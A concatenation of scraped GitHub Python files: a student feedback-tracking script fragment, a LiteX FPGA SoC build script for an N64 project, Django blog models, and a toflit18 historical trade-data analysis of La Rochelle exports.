aemail = df.loc[i, "aemail"]
contact = df.loc[i, "contact"]
name = df.loc[i, "Name"]
dict1[rolln] = {'subjects': {}, 'name': name,
'email': email, 'aemail': aemail, 'contact': contact}
return
def course_master():
df = pd.read_csv('course_master_dont_open_in_excel.csv')
for i in range(len(df)):
subno = df.loc[i, "subno"]
ltp = df.loc[i, "ltp"].split('-')
if subno in dict2:
continue
dict2[subno] = []
for j, s in enumerate(ltp):
if s != '0':
dict2[subno].append(j+1)
def course_registered():
df = pd.read_csv('course_registered_by_all_students.csv')
for i in range(len(df)):
rolln = df.loc[i, "rollno"]
subno = df.loc[i, "subno"]
register_sem = df.loc[i, "register_sem"]
schedule_sem = df.loc[i, "schedule_sem"]
if rolln not in dict1:
dict1[rolln] = {'subjects': {}, 'name': 'NA_IN_STUDENT_INFO',
'email': 'NA_IN_STUDENT_INFO', 'aemail': 'NA_IN_STUDENT_INFO', 'contact': 'NA_IN_STUDENT_INFO'}
dict1[rolln]['subjects'][subno] = {
'ltp': [], 'register_sem': register_sem, 'schedule_sem': schedule_sem}
def feedback():
df = pd.read_csv('course_feedback_submitted_by_students.csv')
for i in range(len(df)):
rolln = df.loc[i, "rollno"]
subno = df.loc[i, "subno"]
feedback_type = df.loc[i, "feedback_type"]
if rolln not in dict1:
continue
if len(dict2[subno]) == 0:
continue
if feedback_type not in dict1[rolln]['subjects'][subno]['ltp']:
dict1[rolln]['subjects'][subno]['ltp'].append(feedback_type)
def correlate(output_file):
if not os.path.exists(output_file):
wb = openpyxl.Workbook()
else:
wb = openpyxl.load_workbook(output_file)
ws = wb['Sheet']
ws.append(["rollno", "register_sem", "schedule_sem",
"subno", "Name", "email", "aemail", "contact"])
for rolln in dict1:
for subject in dict1[rolln]['subjects']:
subno = str(subject)
dict1[rolln]['subjects'][subno]['ltp'].sort()
if dict1[rolln]['subjects'][subno]['ltp'] == dict2[subno]:
continue
register_sem = dict1[rolln]['subjects'][subno]['register_sem']
schedule_sem = dict1[rolln]['subjects'][subno]['schedule_sem']
name = dict1[rolln]['name']
email = dict1[rolln]['email']
aemail = dict1[rolln]['aemail']
contact = dict1[rolln]['contact']
ws.append([rolln, register_sem, schedule_sem,
subno, name, email, aemail, contact])
wb.save(output_file)
def feedback_not_submitted():
ltp_mapping_feedback_type = {1: 'lecture', 2: 'tutorial', 3: 'practical'}
output_file_name = "course_feedback_remaining.xlsx"
student()
course_master()
course_registered()
feedback()
correlate(output_file_name)
feedback_not_submitted()
| apoodwivedi/1901CB10_2021 | tut07/tempCodeRunnerFile.py | tempCodeRunnerFile.py | py | 3,427 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "pandas.read_csv",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "pandas.read_csv",
... |
9438904216 | import os
import argparse
import sys
import subprocess
from migen import *
from migen.genlib.resetsync import AsyncResetSynchronizer
import litex_platform_n64
from litex.build.io import SDRTristate, SDRInput, DDROutput
from litex.soc.cores.clock import *
from litex.soc.cores.spi_flash import SpiFlash, SpiFlashSingle
from litex.soc.cores.gpio import GPIOIn, GPIOOut
from litex.soc.integration.soc_core import *
from litex.soc.integration.builder import *
from litex.soc.integration.common import *
from litex.soc.interconnect import wishbone
from litex.build.generic_platform import *
from litedram.modules import IS42S16320
from litedram.phy import GENSDRPHY
from litex_clock import iCE40PLL_90deg
# Simulation
from litex.build.sim.config import SimConfig
from litedram.phy.model import SDRAMPHYModel
from litex.soc.cores import uart
# IOs ----------------------------------------------------------------------------------------------
_gpios = [
("gpio", 0, Pins("j4:0"), IOStandard("LVCMOS33")),
("gpio", 1, Pins("j4:1"), IOStandard("LVCMOS33")),
]
# CRG ----------------------------------------------------------------------------------------------
class _CRG(Module):
def __init__(self, platform, sys_clk_freq):
self.clock_domains.cd_sys = ClockDomain()
self.clock_domains.cd_sys_ps = ClockDomain()
self.clock_domains.cd_por = ClockDomain()
# # #
# Clk / Rst
clk25 = platform.request("clk25")
platform.add_period_constraint(clk25, 1e9/25e6)
#if sys_clk_freq == 25e6:
# self.comb += self.cd_sys.clk.eq(clk25)
#else:
if True:
# PLL
self.submodules.pll = pll = iCE40PLL(primitive="SB_PLL40_PAD")
pll.register_clkin(clk25, 25e6)
pll.create_clkout(self.cd_sys, sys_clk_freq)
#pll.create_clkout_90(self.cd_sys_ps, sys_clk_freq)
platform.add_period_constraint(self.cd_sys.clk, sys_clk_freq)
#platform.add_period_constraint(self.cd_sys_ps.clk, sys_clk_freq)
self.specials += DDROutput(0, 1, platform.request("sdram_clock"), self.cd_sys.clk)
# Power On Reset
por_cycles = 4096
por_counter = Signal(log2_int(por_cycles), reset=por_cycles-1)
self.comb += self.cd_por.clk.eq(self.cd_sys.clk)
platform.add_period_constraint(self.cd_por.clk, 1e9/sys_clk_freq)
self.sync.por += If(por_counter != 0, por_counter.eq(por_counter - 1))
#self.specials += AsyncResetSynchronizer(self.cd_por, ~rst_n)
self.specials += AsyncResetSynchronizer(self.cd_sys, (por_counter != 0) | ~pll.locked)
# n64 ----------------------------------------------------------------------------------------
kB = 1024
mB = 1024*kB
bios_flash_offset = 0x40000
from sim import get_sdram_phy_settings
class N64SoC(SoCCore):
mem_map = {**SoCCore.mem_map, **{
"spiflash": 0x20000000, # (default shadow @0xa0000000)
}}
def __init__(self, simulate, sdram_init=[], with_analyzer=False):
self.simulate = simulate
if simulate:
platform = litex_platform_n64.N64SimPlatform()
else:
platform = litex_platform_n64.Platform()
sys_clk_freq = int(48e6)
kwargs = {}
kwargs["clk_freq"] = sys_clk_freq
kwargs["cpu_type"] = "vexriscv"
kwargs["cpu_variant"] = "minimal"
kwargs["integrated_rom_size"] = 0
kwargs["integrated_sram_size"] = 2*kB
kwargs["cpu_reset_address"] = self.mem_map["spiflash"] + bios_flash_offset
if simulate:
kwargs["with_uart"] = False
kwargs["with_ethernet"] = False
# SoCMini ----------------------------------------------------------------------------------
SoCCore.__init__(self, platform, **kwargs)
if simulate:
self.submodules.uart_phy = uart.RS232PHYModel(platform.request("serial"))
self.submodules.uart = uart.UART(self.uart_phy)
self.add_csr("uart")
self.add_interrupt("uart")
if not self.integrated_main_ram_size:
if simulate:
sdram_data_width = 16
sdram_module = IS42S16320(sys_clk_freq, "1:1")
phy_settings = get_sdram_phy_settings(
memtype = sdram_module.memtype,
data_width = sdram_data_width,
clk_freq = sys_clk_freq)
self.submodules.sdrphy = SDRAMPHYModel(sdram_module, phy_settings, init=sdram_init)
self.add_constant("MEMTEST_DATA_SIZE", 8*1024)
self.add_constant("MEMTEST_ADDR_SIZE", 8*1024)
else:
self.submodules.sdrphy = GENSDRPHY(platform.request("sdram"))
self.add_sdram("sdram",
phy = self.sdrphy,
module = IS42S16320(sys_clk_freq, "1:1"),
origin = self.mem_map["main_ram"],
size = kwargs.get("max_sdram_size", 0x4000000),
l2_cache_size = kwargs.get("l2_size", 8192),
l2_cache_min_data_width = kwargs.get("min_l2_data_width", 128),
l2_cache_reverse = True
)
# CRG --------------------------------------------------------------------------------------
if simulate:
self.submodules.crg = CRG(platform.request("sys_clk"))
else:
self.submodules.crg = _CRG(platform, sys_clk_freq)
if simulate:
integrated_rom_init = get_mem_data("build/software/bios/bios.bin", "little")
self.add_rom("rom", self.cpu.reset_address, len(integrated_rom_init)*4, integrated_rom_init)
else:
self.submodules.spiflash = SpiFlash(platform.request("spiflash"), dummy=8, endianness="little")
self.register_mem("spiflash", self.mem_map["spiflash"], self.spiflash.bus, size=8*mB)
self.add_csr("spiflash")
self.add_memory_region("rom", self.mem_map["spiflash"] + bios_flash_offset, 32*kB, type="cached+linker")
# Led --------------------------------------------------------------------------------------
self.submodules.led = GPIOOut(platform.request("io0"))
self.add_csr("led")
# GPIOs ------------------------------------------------------------------------------------
self.submodules.gpio0 = GPIOOut(platform.request("io1"))
self.add_csr("gpio0")
self.submodules.gpio1 = GPIOOut(platform.request("io2"))
self.add_csr("gpio1")
platform.add_extension(_gpios)
if with_analyzer:
analyzer_signals = [
self.cpu.ibus,
self.cpu.dbus
]
self.submodules.analyzer = LiteScopeAnalyzer(analyzer_signals, 512)
self.add_csr("analyzer")
# Load / Flash -------------------------------------------------------------------------------------
# Build --------------------------------------------------------------------------------------------
def main():
parser = argparse.ArgumentParser(description="do the thing")
#parser.add_argument("--load", action="store_true", help="load bitstream")
parser.add_argument("--flash", action="store_true", help="flash bitstream")
parser.add_argument("--sim", action="store_true", help="simulate")
parser.add_argument("--threads", default=1, help="simulate")
parser.add_argument("--trace", action="store_true", help="Enable VCD tracing")
parser.add_argument("--trace-start", default=0, help="Cycle to start VCD tracing")
parser.add_argument("--trace-end", default=-1, help="Cycle to end VCD tracing")
parser.add_argument("--opt-level", default="O3", help="Compilation optimization level")
parser.add_argument("--sdram-init", default=None, help="SDRAM init file")
args = parser.parse_args()
sim_config = SimConfig(default_clk="sys_clk")
sim_config.add_module("serial2console", "serial")
build_kwargs = {}
if args.sim:
build_kwargs["threads"] = args.threads
build_kwargs["sim_config"] = sim_config
build_kwargs["opt_level"] = args.opt_level
build_kwargs["trace"] = args.trace
build_kwargs["trace_start"] = int(args.trace_start)
build_kwargs["trace_end"] = int(args.trace_end)
soc = N64SoC(
simulate=args.sim,
sdram_init = [] if args.sdram_init is None else get_mem_data(args.sdram_init, "little"),
)
builder = Builder(soc, output_dir="build", csr_csv="scripts/csr.csv")
builder.build(run=not (args.sim or args.flash), **build_kwargs)
if args.flash:
from litex.build.lattice.programmer import IceStormProgrammer
prog = IceStormProgrammer()
#prog.flash(4194304, "sm64_swapped_half.n64")
prog.flash(bios_flash_offset, "build/software/bios/bios.bin")
prog.flash(0x00000000, "build/gateware/litex_platform_n64.bin")
if args.sim:
builder.build(build=False, **build_kwargs)
if __name__ == "__main__":
main()
| Stary2001/n64 | gateware/litex/litex_soc.py | litex_soc.py | py | 9,352 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "litex.build.io.DDROutput",
"line_number": 66,
"usage_type": "call"
},
{
"api_name": "migen.genlib.resetsync.AsyncResetSynchronizer",
"line_number": 76,
"usage_type": "call"
},
{
"api_name": "litex_platform_n64.N64SimPlatform",
"line_number": 96,
"usage_type... |
30635528648 | from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class Group(models.Model):
""" модель группы """
title = models.CharField(
max_length=200,
verbose_name="Заголовок",
)
slug = models.SlugField(
unique=True,
)
description = models.TextField(
verbose_name="Описание",
)
class Meta:
verbose_name_plural = "Группы"
verbose_name = "Группа"
def __str__(self):
return self.title
class Post(models.Model):
""" модель публикации """
text = models.TextField(
verbose_name="Текст",
)
pub_date = models.DateTimeField(
auto_now_add=True,
verbose_name="Дата публикации",
)
author = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name="posts",
verbose_name="Автор",
)
group = models.ForeignKey(
Group,
on_delete=models.SET_NULL,
related_name="posts",
verbose_name="Группа",
blank=True,
null=True,
)
image = models.ImageField(
upload_to="posts/", blank=True, null=True, verbose_name="Изображение"
)
class Meta:
verbose_name_plural = "Посты"
verbose_name = "Пост"
ordering = ["-pub_date"]
def __str__(self):
return (
f"Пользователь: {self.author.username}, "
f"Группа: {self.group}, "
f'Дата и время: {self.pub_date.strftime("%d.%m.%Y %H:%M:%S")}, '
f"Текст: {self.text[:15]}, "
f"Картинка: {self.image}"
)
class Comment(models.Model):
""" модель комментрия """
post = models.ForeignKey(
Post,
on_delete=models.CASCADE,
related_name="comments",
verbose_name="Пост",
)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name="comments", verbose_name="Автор"
)
text = models.TextField(
verbose_name="Текст",
)
created = models.DateTimeField(
auto_now_add=True, verbose_name="Дата и время публикации"
)
class Meta:
verbose_name_plural = "Комментарии"
verbose_name = "Комментарий"
ordering = ["-created"]
def __str__(self):
return (
f"Пост: {self.post}, "
f"Автор: {self.author}, "
f"Текст: {self.text[:15]}, "
f'Дата: {self.created}.strftime("%d.%m.%Y %H:%M:%S")'
)
class Follow(models.Model):
""" модель подписки """
user = models.ForeignKey(
User,
on_delete=models.CASCADE,
related_name="follower",
verbose_name="Пользователь",
)
author = models.ForeignKey(
User, on_delete=models.CASCADE, related_name="following", verbose_name="Автор"
)
class Meta:
verbose_name = "Система подписки"
def __str__(self):
return f"Автор: {self.author}, Пользователь: {self.user}"
| YaRomanovIvan/yatube | posts/models.py | models.py | py | 3,270 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "django.contrib.auth.get_user_model",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "django.db.models.Model",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "django.db.models",
"line_number": 8,
"usage_type": "name"
},
{
"api_... |
23084020676 | import csv
from operator import itemgetter
from lib import get_online_csv, write_csv, logger, write_readme
products_names_translations = {
"Café": "Coffee",
"Cordonnerie et sellerie": "Shoemaking and upholstery",
"Cuirs, peaux et pelleterie": "Hides, skins and furs",
"Eaux-de-vie et liqueurs": "Brandies and liqueurs",
"Farine, gruau, biscuits et pâtes": "Flour, oatmeal, cookies and pasta",
"Indigo": "Indigo",
"Mercerie": "Haberdashery",
"Objets d'art et d'histoire naturelle": "Works of art and natural history",
"Ouvrages métalliques": "Metallic works",
"Quincaillerie": "Hardware store",
"Sel": "Salt",
"Sucre": "Sugar",
"Toiles de chanvre et de lin": "Hemp and linen fabrics",
"Toiles de coton": "Cotton fabrics",
"Vins de Bordeaux": "Bordeaux wines",
"Vins divers": "Diverse wines",
"Étoffes de laine": "Woolen fabrics",
"Étoffes de soie": "Silk fabrics",
"Toiles diverses" : "Various clothes"
}
"""
Produits dont les valeurs d'exports sont les plus importantes en 1789 : comparaison de La Rochelle à la moyenne française
"""
def compute_top_shared_toflit18_products(flows):
logger.info('start | compute_top_shared_toflit18_products')
total_exports_per_direction = {}
total_imports_per_direction = {}
# calcul de la part de chaque produit dans les exports totaux
total_exports_la_rochelle_1789 = 0
total_exports_toute_france_1789 = 0
total_exports_la_rochelle_1789_without_ports_francs = 0
total_exports_toute_france_1789_without_ports_francs = 0
# normalizes toflit flow to have it as La Rochelle or France
def prepare_flow(flow):
f = flow.copy()
if f['export_import'] == 'Imports' or f['export_import'] == 'import':
f['export_import'] = 'Imports'
elif f['customs_region'] == '' or f['customs_region'] == 'National':
f['customs_region_simpl'] = 'National'
if f['customs_region'] == 'La Rochelle':
f['customs_region_simpl'] = 'La Rochelle'
else:
f['customs_region_simpl'] = 'Autre direction'
f['value'] = float(f['value']) if f['value'] != '' else 0
return f
def clean_flow(flow):
f = flow.copy()
abs_map = total_exports_per_direction if f['export_import'] == 'Exports' else total_imports_per_direction
f['value_rel_per_direction'] = f['value'] / \
abs_map[f['customs_region_simpl']]
return f
def aggregate_exports_by_product(flows):
flows_aggregated_by_product = {}
# je veux construire un dict par produit, en distinguant LR / pas LR
for flow in flows:
if flow['product_revolutionempire'] not in flows_aggregated_by_product:
flows_aggregated_by_product[flow['product_revolutionempire']] = {
'product': flow['product_revolutionempire'],
'exports_la_rochelle': 0,
'exports_toute_france': 0,
}
# à la fin pour chaque produit je sommerais le total export pour calculer du relatif
if flow['customs_region_simpl'] == 'La Rochelle' and flow['export_import'] == 'Exports':
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_la_rochelle'] += float(flow['value'])
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_toute_france'] += float(flow['value'])
return flows_aggregated_by_product
def aggregate_exports_by_product_removing_ports_francs(flows):
flows_aggregated_by_product = {}
# je veux construire un dict par produit, en distinguant LR / pas LR
for flow in flows:
if flow['product_revolutionempire'] not in flows_aggregated_by_product:
flows_aggregated_by_product[flow['product_revolutionempire']] = {
'product': flow['product_revolutionempire'],
'exports_la_rochelle': 0,
'exports_toute_france': 0,
}
# à la fin pour chaque produit je sommerais le total export pour calculer du relatif
if flow['partner_grouping'] != 'France' and flow['export_import'] == 'Exports':
if flow['customs_region_simpl'] == 'La Rochelle':
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_la_rochelle'] += float(flow['value'])
flows_aggregated_by_product[flow['product_revolutionempire']
]['exports_toute_france'] += float(flow['value'])
return flows_aggregated_by_product
for f in flows:
flow = prepare_flow(f)
if flow['export_import'] == 'Imports':
if flow['customs_region_simpl'] not in total_imports_per_direction:
total_imports_per_direction[flow['customs_region_simpl']] = 0
total_imports_per_direction[flow['customs_region_simpl']
] += float(flow['value'])
else:
if flow['customs_region_simpl'] not in total_exports_per_direction:
total_exports_per_direction[flow['customs_region_simpl']] = 0
total_exports_per_direction[flow['customs_region_simpl']
] += float(flow['value'])
flows = [clean_flow(prepare_flow(f)) for f in flows]
# aggregation des flux par produit
product_exports_values_per_direction_1789 = aggregate_exports_by_product(
flows)
product_exports_values_per_direction_1789_without_ports_francs = aggregate_exports_by_product_removing_ports_francs(
flows)
for product, values in product_exports_values_per_direction_1789.items():
total_exports_la_rochelle_1789 += values['exports_la_rochelle']
total_exports_toute_france_1789 += values['exports_toute_france']
for product, values in product_exports_values_per_direction_1789.items():
values['exports_rel_la_rochelle'] = values['exports_la_rochelle'] / \
total_exports_la_rochelle_1789
values['exports_rel_toute_france'] = values['exports_toute_france'] / \
total_exports_toute_france_1789
for product, values in product_exports_values_per_direction_1789_without_ports_francs.items():
total_exports_la_rochelle_1789_without_ports_francs += values['exports_la_rochelle']
total_exports_toute_france_1789_without_ports_francs += values['exports_toute_france']
for product, values in product_exports_values_per_direction_1789_without_ports_francs.items():
values['exports_rel_la_rochelle'] = values['exports_la_rochelle'] / \
total_exports_la_rochelle_1789_without_ports_francs
values['exports_rel_toute_france'] = values['exports_toute_france'] / \
total_exports_toute_france_1789_without_ports_francs
# ordonner en mettant en premier les produits les plus importants pour La Rochelle
sorted_product_exports_values_per_direction_1789 = sorted(
product_exports_values_per_direction_1789.values(), key=itemgetter('exports_rel_la_rochelle'), reverse=True)
sorted_product_exports_values_per_direction_1789_without_ports_francs = sorted(
product_exports_values_per_direction_1789_without_ports_francs.values(), key=itemgetter('exports_rel_la_rochelle'), reverse=True)
# reformatter les données sous la forme d'un ensemble de dicts : un dict par produit pour La Rochelle et un dict par produit pour l'ensemble de la France
final_vega_data_1789 = []
i = 0
for values in sorted_product_exports_values_per_direction_1789:
final_vega_data_1789.append({
"product": values['product'],
"entity": 'direction des fermes de La Rochelle',
"value_rel_per_direction": values['exports_rel_la_rochelle'],
"order": i
})
final_vega_data_1789.append({
"product": values['product'],
"entity": "France (moyenne)",
"value_rel_per_direction": values['exports_rel_toute_france'],
"order": i
})
i += 1
final_vega_data_1789_without_ports_francs = []
i = 0
for values in sorted_product_exports_values_per_direction_1789_without_ports_francs:
final_vega_data_1789_without_ports_francs.append({
"product": values['product'],
"product_fr": values['product'],
"product_en": products_names_translations[values['product']] if values["product"] in products_names_translations else values['product'],
"entity": 'direction des fermes de La Rochelle',
"entity_fr": 'direction des fermes de La Rochelle',
"entity_en": 'direction des fermes of La Rochelle',
"value_rel_per_direction": values['exports_rel_la_rochelle'],
"order": i
})
final_vega_data_1789_without_ports_francs.append({
"product": values['product'],
"product_fr": values['product'],
"product_en": products_names_translations[values['product']] if values["product"] in products_names_translations else values['product'],
"entity": "France (moyenne)",
"entity_fr": "France (moyenne)",
"entity_en": "France (mean)",
"value_rel_per_direction": values['exports_rel_toute_france'],
"order": i
})
i += 1
info = """
`comparison_products_exports_part_la_rochelle.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One product exported by either France or La Rochelle customs direction.
# Filters
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
# Aggregation/computation info
- flows geographic attribution is done according to 3 classes : La Rochelle (customs_direction = "La Rochelle"), National (customs_direection = "National" or "") and "Autre direction"
- France means metrics per products are derivated from all flows, La Rochelle comes from La Rochelle flows only
- products classes are from "revolution & empire" classification
- values aggregated by cumulated value in livre tournois
# Notes/warning
One should wonder if using both national and direction-level for France means might cause duplicates (?).
However it might not matter so much as we are calculating a means of products shares (?).
"""
write_readme("comparison_products_exports_part_la_rochelle/README.md", info)
write_csv("comparison_products_exports_part_la_rochelle/comparison_products_exports_part_la_rochelle.csv", final_vega_data_1789_without_ports_francs)
logger.debug('done | compute_top_shared_toflit18_products')
def compute_global_la_rochelle_evolution (flows_national, flows_regional):
logger.info('start | compute_global_la_rochelle_evolution')
years_list = [y + 1720 for y in range(1789 - 1720 + 1)]
flows_national = [f for f in flows_national if int(f["year"].split('.')[0]) >= 1720 and int(f["year"].split('.')[0]) <= 1789]
flows_regional = [f for f in flows_regional if int(f["year"].split('.')[0]) >= 1720 and int(f["year"].split('.')[0]) <= 1789]
years = {}
for y in years_list:
years[y] = {
"year": y,
"france_total": 0,
"france_export": 0,
"france_import": 0,
"la_rochelle_total": 0,
"la_rochelle_export": 0,
"la_rochelle_import": 0,
}
for f in flows_national:
year = int(str(f['year'].split('.')[0]))
value = float(f['value']) if f['value'] != '' else 0
itype = f['export_import'] if f['export_import'] != 'import' else 'Imports'
detailed_field = 'france_import' if itype == 'Imports' else 'france_export'
years[year]['france_total'] = years[year]['france_total'] + value
years[year][detailed_field] = years[year][detailed_field] + value
for f in flows_regional:
year = int(str(f['year'].split('.')[0]))
value = float(f['value']) if f['value'] != '' else 0
itype = f['export_import'] if f['export_import'] != 'import' else 'Imports'
from_larochelle = f['customs_region'] == 'La Rochelle'
if from_larochelle:
detailed_field = 'la_rochelle_import' if itype == 'Imports' else 'la_rochelle_export'
years[year]['la_rochelle_total'] += value
years[year][detailed_field] += value
part_by_year = []
for year, values in years.items():
part_by_year.append({
"year": year,
"type": "import",
"portion": values['la_rochelle_import'] / values['france_total'] if values['france_total'] > 0 else 0
})
part_by_year.append({
"year": year,
"type": "export",
"portion": values['la_rochelle_export'] / values['france_total'] if values['france_total'] > 0 else 0
})
info = """
`global_evolution_la_rochelle_imports_exports.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One year of import or export for La Rochelle, with attached metrics about share of trade against france total trade.
# Filters
- for La Rochelle numbers : source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- for national numbers : source "best guess national partner" (best_guess_national_partner == 1)
- we exclude ports francs ("product_grouping" != "France")
# Aggregation/computation info
- values aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("global_evolution_la_rochelle_imports_exports/README.md", info)
write_csv("global_evolution_la_rochelle_imports_exports/global_evolution_la_rochelle_imports_exports.csv", part_by_year)
logger.debug('done | compute_global_la_rochelle_evolution')
def compute_exports_colonial_products(flows):
logger.info('start | compute_exports_colonial_products')
output = []
origins = set()
pasa_provinces = ['Aunis', 'Poitou', 'Saintonge', 'Angoumois']
# Starting with sables d'Olonne as they are not in the data
customs_offices = {
"Les Sables d'Olonne": {
"autres produits": 0,
"produits coloniaux": 0,
"produits de la région PASA" : 0
}
}
for f in [f for f in flows if f["customs_region"] == "La Rochelle"] :
product_viz = ''
product_viz_alt = ''
product = f['product_revolutionempire']
customs_office = f['customs_office'] if f['customs_office'] != 'Aligre' else 'Marans';
if (customs_office not in customs_offices):
customs_offices[customs_office] = {
"autres produits": 0,
"produits coloniaux": 0,
"produits de la région PASA" : 0
}
value = str(f['value']).split('.')[0] if str(f['value']).split('.')[0] != '' else 0
flow_type = f['export_import']
local_origin = True if f['origin_province'] in pasa_provinces else False
if product in ['Café', 'Sucre', 'Indigo', 'Coton non transformé']:
product_viz = "produits coloniaux"
product_viz_alt = "produits coloniaux"
else:
product_viz = "autres produits"
if local_origin == True:
product_viz_alt = "produits de la région PASA"
else:
product_viz_alt = "autres produits"
if f["export_import"] == "Exports":
customs_offices[customs_office][product_viz_alt] += float(value)
english_translation = {
'produits de la région PASA': 'PASA region products',
'produits coloniaux': 'colonial products',
'autres produits': 'other products'
}
for customs_office, products in customs_offices.items():
for product, value in products.items():
output.append({
"value": value,
"customs_office": customs_office,
"type_fr": product,
"type_en": english_translation[product]
})
output = sorted(output, key=lambda v : -v["value"])
info = """
`comparaison_exports_coloniaux.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One class of product for one customs office (direction des fermes) with its value.
# Filters
- year = 1789
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
# Aggregation/computation info
- products are classed along three categories:
- "produit colonial" if product revolution&empire class is in ['Café', 'Sucre', 'Indigo', 'Coton non transformé']
- "produit de la région PASA" if "origin_province" is in ['Aunis', 'Poitou', 'Saintonge', 'Angoumois']
- "autre produit" for all the rest
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("comparaison_exports_coloniaux/README.md", info)
write_csv("comparaison_exports_coloniaux/comparaison_exports_coloniaux.csv", output)
logger.debug('done | compute_exports_colonial_products')
def compute_eau_de_vie_datasets(flows):
logger.info('start | compute_eau_de_vie_datasets')
eau_de_vie_types = get_online_csv("https://docs.google.com/spreadsheets/d/e/2PACX-1vQI3rLZXqFtiqO4q8Pbp5uGH8fon-hYrd-LnJGtsYMe6UWWCwubvanKZY4FW1jI6eJ5OJ_GA8xUxYQf/pub?output=csv")
eau_de_vie_types_map = {}
for item in eau_de_vie_types:
eau_de_vie_types_map[item['product_simplification']] = item['type_edv']
la_rochelle_exports_by_year = {}
export_slices = {
"1750": {
"La Rochelle": 0,
"Bordeaux": 0,
"Nantes": 0,
"Bayonne": 0,
"Montpellier": 0
},
"1770": {
"La Rochelle": 0,
"Bordeaux": 0,
"Nantes": 0,
"Bayonne": 0,
"Montpellier": 0
},
"1789": {
"La Rochelle": 0,
"Bordeaux": 0,
"Nantes": 0,
"Bayonne": 0,
"Montpellier": 0
}
}
origins = {}
for flow in flows:
value = float(flow['value']) if flow['value'] != '' else 0
year = flow['year']
customs_region = flow['customs_region']
origin = flow['origin'] if flow['origin'] != '' else 'inconnu'
if flow['export_import'] == 'Exports':
if year in export_slices:
if customs_region in export_slices[year]:
export_slices[year][customs_region] += value
if customs_region == 'La Rochelle':
if year not in la_rochelle_exports_by_year:
la_rochelle_exports_by_year[year] = value
else:
la_rochelle_exports_by_year[year] += value
if year == '1789':
if origin not in origins:
origins[origin] = {
"total": 0,
"EDV simple": 0,
"EDV double": 0
}
origins[origin]['total'] += value
origins[origin][eau_de_vie_types_map[flow['product_simplification']]] += value
origins_map = {}
for origin, types in origins.items():
for that_type, value in types.items():
resolved_type = 'eau-de-vie simple' if that_type == 'EDV simple' else 'eau-de-vie double'
if origin not in origins_map:
origins_map[origin] = {}
if resolved_type not in origins_map[origin]:
origins_map[origin][resolved_type] = 0
origins_map[origin][resolved_type] += float(value)
origins_list = []
for origin, types in origins_map.items():
for that_type, value in types.items():
origins_list.append({
"origin": origin,
"type": that_type,
"value": value
})
export_slices_array = []
for year, values in export_slices.items():
for region, local_value in values.items():
export_slices_array.append({
"year": year,
"customs_region": region,
"value": local_value
})
la_rochelle_exports_by_year = [{"year": year, "value": value} for year, value in la_rochelle_exports_by_year.items()]
info = """
`exports_eau_de_vie_la_rochelle_longitudinal.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One year of eau-de-vie exports from La Rochelle.
# Filters
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
- customs_direction = "La Rochelle"
- type = exports
- filtering eau-de-vie products : flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin"
# Aggregation/computation info
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("exports_eau_de_vie_la_rochelle_longitudinal/README.md", info)
write_csv("exports_eau_de_vie_la_rochelle_longitudinal/exports_eau_de_vie_la_rochelle_longitudinal.csv", la_rochelle_exports_by_year)
info = """
`exports_eau_de_vie_comparaison_directions_des_fermes.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One year of eau-de-vie exports for one specific customs direction (direction des fermes).
# Filters
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
- we exclude ports francs ("product_grouping" != "France")
- customs_direction = "La Rochelle" or "Bordeaux" or "Nantes" or "Bayonne" or "Montpellier"
- type = exports
- filtering eau-de-vie products : flow["product_revolutionempire"] == "Eaux-de-vie et liqueurs" or flow["product_simplification"] == "vin et eau-de-vie" or flow["product_simplification"] == "vin et eau-de-vie de vin"
# Aggregation/computation info
- values are aggregated by cumulated value in livre tournois
# Notes/warning
/
"""
write_readme("exports_eau_de_vie_comparaison_directions_des_fermes/README.md", info)
write_csv("exports_eau_de_vie_comparaison_directions_des_fermes/exports_eau_de_vie_comparaison_directions_des_fermes.csv", export_slices_array)
info = """
`origines_exports_eau_de_vie_1789_la_rochelle.csv` documentation
===
# What is the original data ?
toflit18 flows from [`bdd courante.csv`](https://github.com/medialab/toflit18_data/blob/master/base/bdd%20courante.csv.zip) file
# What does a line correspond to ?
One type of eau-de-vie, for one type of origin.
# Filters
- year = 1789
- source "Best Guess customs region prod x partner" (best_guess_region_prodxpart == 1)
